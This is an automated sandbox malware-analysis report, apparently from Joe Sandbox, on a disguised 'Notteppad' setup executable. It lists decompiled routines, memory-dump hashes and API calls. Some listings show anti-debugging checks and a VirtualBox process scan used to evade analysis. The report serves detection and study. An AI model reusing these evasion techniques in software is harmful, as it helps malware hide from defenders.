                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: {8n
                                      • API String ID: 0-443592199
                                      • Opcode ID: f924ea5a8f57c9fa86eff03538587d60ac39baea2dff29d6d3356230a84d21ee
                                      • Instruction ID: 3fda2ad0f9aadbdb39192c43b7a5fb06a130e432a8613e87cbfa32b1d3b25da1
                                      • Opcode Fuzzy Hash: f924ea5a8f57c9fa86eff03538587d60ac39baea2dff29d6d3356230a84d21ee
                                      • Instruction Fuzzy Hash: 9B23CA76D002289FDB14CF9AC8C54DDFBB2BF8C354B5A8299DD197B341C6B06A12CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E004041D0(intOrPtr* _a4, signed long long* _a8) {
                                      				unsigned int _v32;
                                      				signed int _v36;
                                      				unsigned int _v40;
                                      				signed long long _v44;
                                      				signed int _v48;
                                      				signed long long _v52;
                                      				signed int _v56;
                                      				signed long long _v60;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t106;
                                      				signed int _t107;
                                      				signed int _t113;
                                      				signed long long _t120;
                                      				signed int _t122;
                                      				unsigned int _t129;
                                      				unsigned int _t131;
                                      				unsigned int _t133;
                                      				unsigned int _t137;
                                      				signed int _t140;
                                      				unsigned int _t141;
                                      				signed int _t143;
                                      				unsigned int _t154;
                                      				signed long long* _t155;
                                      				unsigned int _t157;
                                      				signed long long _t168;
                                      				signed long long _t172;
                                      
                                      				_t155 =  &_v60;
                                      				_t78 = _a4;
                                      				if( *_t78 != 0) {
                                      					 *_t78 = 0;
                                      					return _a8;
                                      				} else {
                                      					_t120 =  *0x424fb0; // 0x5497fdb5
                                      					_t107 =  *0x424fb4; // 0x106689d4
                                      					_t143 =  *0x424fa8; // 0xb
                                      					_t154 =  *0x424fac; // 0x0
                                      					_v60 = _t120;
                                      					_v56 = _t107;
                                      					while(1) {
                                      						L4:
                                      						_t129 = _v56;
                                      						_v40 = (_t154 << 0x00000020 | _t143) << 0x17 ^ _t154;
                                      						_v44 = _t143 << 0x00000017 ^ _t143;
                                      						_t131 = _v40;
                                      						_t122 = _v60;
                                      						_t143 = _v60 ^ (_t129 << 0x00000020 | _v60) >> 0x1a ^ _v44 ^ (_t131 << 0x00000020 | _v44) >> 0x11;
                                      						_t113 = _v56;
                                      						_t154 = _v56 ^ _t129 >> 0x0000001a ^ _t131 ^ _t131 >> 0x00000011;
                                      						_t133 = _t113;
                                      						asm("adc edx, esi");
                                      						_v60 = (_t133 << 0x00000020 | _t122 + _t143) >> 0xb;
                                      						_v56 = _t133 >> 0xb;
                                      						asm("fild qword [esp+0x10]");
                                      						_v60 = _t122;
                                      						_v56 = _t113;
                                      						asm("fxch st0, st1");
                                      						_v52 = _v60 ^ _t122 << 0x00000017;
                                      						_v48 = _v56 ^ (_t113 << 0x00000020 | _t122) << 0x17;
                                      						_t137 = _v48;
                                      						asm("fld1");
                                      						_v60 = _v52 ^ (_t137 << 0x00000020 | _v52) >> 0x11 ^ _t143 ^ (_t154 << 0x00000020 | _t143) >> 0x1a;
                                      						_v56 = _v48 ^ _t137 >> 0x00000011 ^ _t154 ^ _t154 >> 0x0000001a;
                                      						_t140 = _v56;
                                      						asm("adc edx, ebp");
                                      						_t141 = _t140 >> 0xb;
                                      						_t157 = _t141;
                                      						_v36 = (_t140 << 0x00000020 | _v60 + _t143) >> 0xb;
                                      						_v32 = _t141;
                                      						asm("fild qword [esp+0x28]");
                                      						asm("fmulp st3, st0");
                                      						asm("fxch st0, st2");
                                      						_t168 = st1 * st2;
                                      						asm("faddp st1, st0");
                                      						asm("fcomi st0, st3");
                                      						st3 = _t168;
                                      						if(_t157 >= 0) {
                                      							break;
                                      						}
                                      						asm("fldz");
                                      						asm("fxch st0, st3");
                                      						asm("fucomi st0, st3");
                                      						st3 = _t168;
                                      						if(_t157 == 0) {
                                      							if(_t157 == 0) {
                                      								st0 = _t168;
                                      								st0 = _t168;
                                      								st0 = _t168;
                                      								continue;
                                      							} else {
                                      							}
                                      						}
                                      						_v44 = _t168;
                                      						_v52 = _t168;
                                      						asm("fst qword [esp]");
                                      						_v60 = _t168;
                                      						 *0x424fa8 = _t143;
                                      						 *0x424fac = _t154;
                                      						 *0x424fb0 = _v60;
                                      						 *0x424fb4 = _v56;
                                      						L0040A320();
                                      						asm("fdivp st1, st0");
                                      						asm("fldz");
                                      						asm("fucomip st0, st1");
                                      						_t172 = _v44;
                                      						if(_t157 > 0) {
                                      							_v52 = _t172;
                                      							_v60 = _t172;
                                      							 *_t155 = _t172;
                                      							L0040A2E0();
                                      							_t172 = _v52;
                                      							asm("fxch st0, st2");
                                      						} else {
                                      							asm("fxch st0, st2");
                                      							asm("fsqrt");
                                      						}
                                      						asm("fxch st0, st1");
                                      						 *_a8 = _t172 * st0;
                                      						_t106 = _a4;
                                      						asm("fmulp st1, st0");
                                      						 *_t106 = 1;
                                      						return _t106;
                                      						goto L13;
                                      					}
                                      					st0 = _t168;
                                      					st0 = _t168;
                                      					st0 = _t168;
                                      					goto L4;
                                      				}
                                      				L13:
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: sqrt
                                      • String ID:
                                      • API String ID: 1201437784-0
                                      • Opcode ID: 510b901532c67414beb63c89f44dafdffb7e5982264c177ff0f98c0639b0246a
                                      • Instruction ID: 0b172926866724bf42b23e7428fe8ce19ccef81841becbe3a1a1947200cabddc
                                      • Opcode Fuzzy Hash: 510b901532c67414beb63c89f44dafdffb7e5982264c177ff0f98c0639b0246a
                                      • Instruction Fuzzy Hash: 97615DB2B083058BC305DF59E58064AF7E1EBC8780F564D6DE484E33A5E77199298BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 006E9944
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E994B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: c514dd71ded820ac0d7dad3d704372dcacb21c3cb86f97758742e4d1bcdf97c0
                                      • Instruction ID: fa2646725272e20460e1659e30ead45c74ce907f4663391b90cb6bb6e84c2f8a
                                      • Opcode Fuzzy Hash: c514dd71ded820ac0d7dad3d704372dcacb21c3cb86f97758742e4d1bcdf97c0
                                      • Instruction Fuzzy Hash: 0BE0C27175034ABBEF108BA19C06BEB33AD9B0075EF100068B701E51C1EAB4DA80D675
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 006E99D8
                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 006E99DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentInformationQuery
                                      • String ID:
                                      • API String ID: 3953534283-0
                                      • Opcode ID: ee79916bc195a4a8c2dca9ed0103d3ba08d7abe9b1e2c434fdaba3b468880919
                                      • Instruction ID: 03d2962e9706b6d0671f37deb78c7293f5c32a5cd0f569e0d57f096fc39c0d3c
                                      • Opcode Fuzzy Hash: ee79916bc195a4a8c2dca9ed0103d3ba08d7abe9b1e2c434fdaba3b468880919
                                      • Instruction Fuzzy Hash: F1E01272751305F7EB108BA1EC47BEE73ADAB0079DF240159BB05E51C0DAB8DA40D675
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006EA022), ref: 006E9FF4
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006EA015
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 9c12b51246c3c0b27ade9a710aa2631a9d195fed3dd9ef3e3a08446d6f0809c0
                                      • Instruction ID: 6a94e7786e447df7360c69b9fce3a3761217d309ea55452c662ac2a0508454e9
                                      • Opcode Fuzzy Hash: 9c12b51246c3c0b27ade9a710aa2631a9d195fed3dd9ef3e3a08446d6f0809c0
                                      • Instruction Fuzzy Hash: DDE0DFB0645384BFDB40CBA8ED55BAE7FB3F708304F10008EE801D2A92CAF58944CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006EA022), ref: 006E9FF4
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006EA015
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 0c6b6e403a71808407493642865b1165b79735d4f0e9ad14befd73290f274de7
                                      • Instruction ID: 6f8513974a7ecec3626218b33d6e28d477d635068ac856b1db75c7a58a7df49d
                                      • Opcode Fuzzy Hash: 0c6b6e403a71808407493642865b1165b79735d4f0e9ad14befd73290f274de7
                                      • Instruction Fuzzy Hash: 66E08C70241304BFD740DBA9E909B9E7BBBE708308F000049F801D2692CAB1AA40CB20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000), ref: 006E9593
                                      • CheckRemoteDebuggerPresent.KERNEL32(00000000), ref: 006E959A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
                                      • API String ID: 3244773808-0
                                      • Opcode ID: d1f9a6517c6f9e6e06702924e293853d71df09fe0ac8462baaae20c0bfb6ab70
                                      • Instruction ID: e73f60882812de76dc093d97cdd59c0764c0ca55a308575a2e629ba4b4872f54
                                      • Opcode Fuzzy Hash: d1f9a6517c6f9e6e06702924e293853d71df09fe0ac8462baaae20c0bfb6ab70
                                      • Instruction Fuzzy Hash: FAD0CA7191020AEBCB04DBE0E90AADEB7BDAB0420AF501084E501E2210CA78AA00DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006E96F8), ref: 006E96D1
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006E96EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: c8d69ed0c66aa7411ac30acacdf283b18c4252acf3757a6b52df55f23909e9f6
                                      • Instruction ID: 88ad6f558a65e3a0b8c7a46658c14e25e2b8b40acf334c5209eb921a7f5cc018
                                      • Opcode Fuzzy Hash: c8d69ed0c66aa7411ac30acacdf283b18c4252acf3757a6b52df55f23909e9f6
                                      • Instruction Fuzzy Hash: C7D012B03822014FDB548B24DD197A93763E708305F112045AD05C27A1CEB58440CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,006E973B), ref: 006E971D
                                      • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 006E972F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: dd4335dd3f045400a12686d450a6d1d25e029c8cb9e8c770cf0b8df737415da4
                                      • Instruction ID: 726a4073d4cac80b463d1f2a63f9bafe6f3c9cf33cba40348870a9ef478af52e
                                      • Opcode Fuzzy Hash: dd4335dd3f045400a12686d450a6d1d25e029c8cb9e8c770cf0b8df737415da4
                                      • Instruction Fuzzy Hash: CCC04C746813019BDF449F65EE5DB6A3B77F704705F012801AD0586EB8CFB58194CF14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: hXMV$hXMV
                                      • API String ID: 0-400149659
                                      • Opcode ID: ad7042868452514f3405e3834078fe3582248539a460e807010c5405dcffb4bf
                                      • Instruction ID: 1f2b31face74edd86cddd9c85f006e5f2f39f958a296007423c98335a3d8f8cd
                                      • Opcode Fuzzy Hash: ad7042868452514f3405e3834078fe3582248539a460e807010c5405dcffb4bf
                                      • Instruction Fuzzy Hash: DAF0CD76E04795EFD7148749DD51BBFFBB8E745B31F30422AF551632C0C27959018AA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                      • String ID: vboxservice.exe$vboxtray.exe
                                      • API String ID: 1083639309-1571995788
                                      • Opcode ID: da864cd24bd2a821171fd1f66fed0c9961250d670f62a05f1d3fb58364090947
                                      • Instruction ID: 5d201ff1950091d3304592e6071e611c663c988682be6f82849efe0d01435874
                                      • Opcode Fuzzy Hash: da864cd24bd2a821171fd1f66fed0c9961250d670f62a05f1d3fb58364090947
                                      • Instruction Fuzzy Hash: 85E048766022487AEB115A879C4D9DBBF69EF80365F500079E64166210D3B15D058664
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E00404207(signed int __edi, unsigned int __ebp, signed long long __fp0, signed long long _a16, signed int _a20, signed long long _a24, signed int _a28, signed long long _a32, unsigned int _a36, signed int _a40, unsigned int _a44, intOrPtr* _a80, signed long long* _a84) {
                                      				intOrPtr* _t100;
                                      				signed int _t106;
                                      				signed int _t115;
                                      				unsigned int _t122;
                                      				unsigned int _t124;
                                      				unsigned int _t126;
                                      				unsigned int _t130;
                                      				signed int _t133;
                                      				unsigned int _t134;
                                      				signed int _t135;
                                      				unsigned int _t148;
                                      				signed long long* _t150;
                                      				unsigned int _t152;
                                      				signed long long _t153;
                                      				signed long long _t166;
                                      
                                      				_t153 = __fp0;
                                      				_t148 = __ebp;
                                      				_t135 = __edi;
                                      				while(1) {
                                      					L1:
                                      					st0 = _t153;
                                      					st0 = _t153;
                                      					st0 = _t153;
                                      					while(1) {
                                      						_t122 = _a20;
                                      						_a36 = (_t148 << 0x00000020 | _t135) << 0x17 ^ _t148;
                                      						_a32 = _t135 << 0x00000017 ^ _t135;
                                      						_t124 = _a36;
                                      						_t115 = _a16;
                                      						_t135 = _a16 ^ (_t122 << 0x00000020 | _a16) >> 0x1a ^ _a32 ^ (_t124 << 0x00000020 | _a32) >> 0x11;
                                      						_t106 = _a20;
                                      						_t148 = _a20 ^ _t122 >> 0x0000001a ^ _t124 ^ _t124 >> 0x00000011;
                                      						_t126 = _t106;
                                      						asm("adc edx, esi");
                                      						_a16 = (_t126 << 0x00000020 | _t115 + _t135) >> 0xb;
                                      						_a20 = _t126 >> 0xb;
                                      						asm("fild qword [esp+0x10]");
                                      						_a16 = _t115;
                                      						_a20 = _t106;
                                      						asm("fxch st0, st1");
                                      						_a24 = _a16 ^ _t115 << 0x00000017;
                                      						_a28 = _a20 ^ (_t106 << 0x00000020 | _t115) << 0x17;
                                      						_t130 = _a28;
                                      						asm("fld1");
                                      						_a16 = _a24 ^ (_t130 << 0x00000020 | _a24) >> 0x11 ^ _t135 ^ (_t148 << 0x00000020 | _t135) >> 0x1a;
                                      						_a20 = _a28 ^ _t130 >> 0x00000011 ^ _t148 ^ _t148 >> 0x0000001a;
                                      						_t133 = _a20;
                                      						asm("adc edx, ebp");
                                      						_t134 = _t133 >> 0xb;
                                      						_t152 = _t134;
                                      						_a40 = (_t133 << 0x00000020 | _a16 + _t135) >> 0xb;
                                      						_a44 = _t134;
                                      						asm("fild qword [esp+0x28]");
                                      						asm("fmulp st3, st0");
                                      						asm("fxch st0, st2");
                                      						_t153 = st1 * st2;
                                      						asm("faddp st1, st0");
                                      						asm("fcomi st0, st3");
                                      						st3 = _t153;
                                      						if(_t152 >= 0) {
                                      							goto L1;
                                      						}
                                      						asm("fldz");
                                      						asm("fxch st0, st3");
                                      						asm("fucomi st0, st3");
                                      						st3 = _t153;
                                      						if(_t152 == 0) {
                                      							if(_t152 == 0) {
                                      								st0 = _t153;
                                      								st0 = _t153;
                                      								st0 = _t153;
                                      								continue;
                                      							} else {
                                      							}
                                      						}
                                      						_a32 = _t153;
                                      						_a24 = _t153;
                                      						asm("fst qword [esp]");
                                      						_a16 = _t153;
                                      						 *0x424fa8 = _t135;
                                      						 *0x424fac = _t148;
                                      						 *0x424fb0 = _a16;
                                      						 *0x424fb4 = _a20;
                                      						L0040A320();
                                      						asm("fdivp st1, st0");
                                      						asm("fldz");
                                      						asm("fucomip st0, st1");
                                      						_t166 = _a32;
                                      						if(_t152 > 0) {
                                      							_a24 = _t166;
                                      							_a16 = _t166;
                                      							 *_t150 = _t166;
                                      							L0040A2E0();
                                      							_t166 = _a24;
                                      							asm("fxch st0, st2");
                                      						} else {
                                      							asm("fxch st0, st2");
                                      							asm("fsqrt");
                                      						}
                                      						asm("fxch st0, st1");
                                      						 *_a84 = _t166 * st0;
                                      						_t100 = _a80;
                                      						asm("fmulp st1, st0");
                                      						 *_t100 = 1;
                                      						return _t100;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5a2c67faa2c93ca964f023fe5fadf5eb5667684dd5dd7312c7ebc354b889e355
                                      • Instruction ID: b7ec35658c69be80a705284070d6739f48c03669a893b925ad2fe9f30268616b
                                      • Opcode Fuzzy Hash: 5a2c67faa2c93ca964f023fe5fadf5eb5667684dd5dd7312c7ebc354b889e355
                                      • Instruction Fuzzy Hash: 91515CB2F083058BC305DE69D98024AF7E1EBC8780F564D2DE485E37A5FA719D198BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 67%
                                      			E00404218(signed int __edi, unsigned int __ebp, signed long long __fp0, signed long long _a16, signed int _a20, signed long long _a24, signed int _a28, signed long long _a32, unsigned int _a36, signed int _a40, unsigned int _a44, intOrPtr* _a80, signed long long* _a84) {
                                      				intOrPtr* _t100;
                                      				signed int _t106;
                                      				signed int _t115;
                                      				unsigned int _t122;
                                      				unsigned int _t124;
                                      				unsigned int _t126;
                                      				unsigned int _t130;
                                      				signed int _t133;
                                      				unsigned int _t134;
                                      				signed int _t135;
                                      				unsigned int _t148;
                                      				signed long long* _t150;
                                      				unsigned int _t152;
                                      				signed long long _t153;
                                      				signed long long _t166;
                                      
                                      				_t153 = __fp0;
                                      				_t148 = __ebp;
                                      				_t135 = __edi;
                                      				do {
                                      					st0 = _t153;
                                      					st0 = _t153;
                                      					st0 = _t153;
                                      					while(1) {
                                      						_t122 = _a20;
                                      						_a36 = (_t148 << 0x00000020 | _t135) << 0x17 ^ _t148;
                                      						_a32 = _t135 << 0x00000017 ^ _t135;
                                      						_t124 = _a36;
                                      						_t115 = _a16;
                                      						_t135 = _a16 ^ (_t122 << 0x00000020 | _a16) >> 0x1a ^ _a32 ^ (_t124 << 0x00000020 | _a32) >> 0x11;
                                      						_t106 = _a20;
                                      						_t148 = _a20 ^ _t122 >> 0x0000001a ^ _t124 ^ _t124 >> 0x00000011;
                                      						_t126 = _t106;
                                      						asm("adc edx, esi");
                                      						_a16 = (_t126 << 0x00000020 | _t115 + _t135) >> 0xb;
                                      						_a20 = _t126 >> 0xb;
                                      						asm("fild qword [esp+0x10]");
                                      						_a16 = _t115;
                                      						_a20 = _t106;
                                      						asm("fxch st0, st1");
                                      						_a24 = _a16 ^ _t115 << 0x00000017;
                                      						_a28 = _a20 ^ (_t106 << 0x00000020 | _t115) << 0x17;
                                      						_t130 = _a28;
                                      						asm("fld1");
                                      						_a16 = _a24 ^ (_t130 << 0x00000020 | _a24) >> 0x11 ^ _t135 ^ (_t148 << 0x00000020 | _t135) >> 0x1a;
                                      						_a20 = _a28 ^ _t130 >> 0x00000011 ^ _t148 ^ _t148 >> 0x0000001a;
                                      						_t133 = _a20;
                                      						asm("adc edx, ebp");
                                      						_t134 = _t133 >> 0xb;
                                      						_t152 = _t134;
                                      						_a40 = (_t133 << 0x00000020 | _a16 + _t135) >> 0xb;
                                      						_a44 = _t134;
                                      						asm("fild qword [esp+0x28]");
                                      						asm("fmulp st3, st0");
                                      						asm("fxch st0, st2");
                                      						_t153 = st1 * st2;
                                      						asm("faddp st1, st0");
                                      						asm("fcomi st0, st3");
                                      						st3 = _t153;
                                      						if(_t152 < 0) {
                                      							break;
                                      						}
                                      						st0 = _t153;
                                      						st0 = _t153;
                                      						st0 = _t153;
                                      					}
                                      					asm("fldz");
                                      					asm("fxch st0, st3");
                                      					asm("fucomi st0, st3");
                                      					st3 = _t153;
                                      					if(_t152 == 0) {
                                      						goto L5;
                                      					}
                                      					L7:
                                      					_a32 = _t153;
                                      					_a24 = _t153;
                                      					asm("fst qword [esp]");
                                      					_a16 = _t153;
                                      					 *0x424fa8 = _t135;
                                      					 *0x424fac = _t148;
                                      					 *0x424fb0 = _a16;
                                      					 *0x424fb4 = _a20;
                                      					L0040A320();
                                      					asm("fdivp st1, st0");
                                      					asm("fldz");
                                      					asm("fucomip st0, st1");
                                      					_t166 = _a32;
                                      					if(_t152 > 0) {
                                      						_a24 = _t166;
                                      						_a16 = _t166;
                                      						 *_t150 = _t166;
                                      						L0040A2E0();
                                      						_t166 = _a24;
                                      						asm("fxch st0, st2");
                                      					} else {
                                      						asm("fxch st0, st2");
                                      						asm("fsqrt");
                                      					}
                                      					asm("fxch st0, st1");
                                      					 *_a84 = _t166 * st0;
                                      					_t100 = _a80;
                                      					asm("fmulp st1, st0");
                                      					 *_t100 = 1;
                                      					return _t100;
                                      					L5:
                                      				} while (_t152 == 0);
                                      				goto L7;
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d168a499b76dc36a51d3e3325bd0ea59d4ccdfa650b9c039e9272f353ecb675a
                                      • Instruction ID: 257f6033f5ac05b1f416a5031ae779b70a228f64a38ca2020c3ebbfe45dc0ed7
                                      • Opcode Fuzzy Hash: d168a499b76dc36a51d3e3325bd0ea59d4ccdfa650b9c039e9272f353ecb675a
                                      • Instruction Fuzzy Hash: E6515CB2F083068BC305DE69D98024AF7E1EBC8740F564D2DE484E37A5FA719D198BC6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: ac1190b1ac409dad433bc65c19169be42cd408ec514bf2bfdd76027fd8d017f3
                                      • Instruction ID: 7e37d55cd6f4fc24d4d1f94f489c7b493716e129e169a27b481f3a34debe4e29
                                      • Opcode Fuzzy Hash: ac1190b1ac409dad433bc65c19169be42cd408ec514bf2bfdd76027fd8d017f3
                                      • Instruction Fuzzy Hash: AAE065B6615754FFD7108B8DCD46B6ABBACF741B75F100719F122927C0D774250086A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 006E9A99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationQuerySystem
                                      • String ID:
                                      • API String ID: 3562636166-0
                                      • Opcode ID: 3d82f797814264fc7bdd75fb98ba2796dd46509c0d2b7658ec1231f248b092c7
                                      • Instruction ID: ea7eead21ebaf3e251df5cfb73a8ef3831af18335541f08be55d9f352d1baec8
                                      • Opcode Fuzzy Hash: 3d82f797814264fc7bdd75fb98ba2796dd46509c0d2b7658ec1231f248b092c7
                                      • Instruction Fuzzy Hash: 06E01261A5438C3DFB1186959C0BF9A76E94F00758F0051A9A501E42C5E6E5DD848361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
